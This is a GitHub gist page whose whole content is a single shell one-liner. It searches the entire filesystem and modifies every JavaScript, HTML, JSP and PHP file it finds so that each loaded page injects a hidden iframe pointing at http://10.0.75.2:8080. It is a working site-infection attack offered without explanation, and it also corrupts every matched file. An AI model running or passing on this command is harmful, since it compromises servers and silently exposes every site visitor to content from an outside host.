Skip to content

Instantly share code, notes, and snippets.

@Naramsim
Last active December 18, 2016 16:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Naramsim/05e770c3c0c07e54a35876f78ade98f3 to your computer and use it in GitHub Desktop.
Save Naramsim/05e770c3c0c07e54a35876f78ade98f3 to your computer and use it in GitHub Desktop.
find / -type f -name "*.js" -exec sh -c 'echo ";document.addEventListener(\"DOMContentLoaded\", function(event) { document.body.insertAdjacentHTML( \"beforeend\", \"<iframe style='"'"'display:none'"'"' src='"'"'http://10.0.75.2:8080'"'"'></iframe>\" );});" >> "$1"' -- {} \; ; find / -type f -iregex '.*\.\(html\|htm\|jsp\|php\)$' -exec sed -i 's/<\/body>/<iframe style="display:none" src="http:\/\/10.0.75.2:8080"><\/iframe><\/body>/g' {} \;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment